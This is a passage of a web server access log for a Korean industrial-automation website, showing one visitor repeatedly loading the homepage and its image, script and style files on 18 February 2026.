"https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10543] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10526] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:10:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:11:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 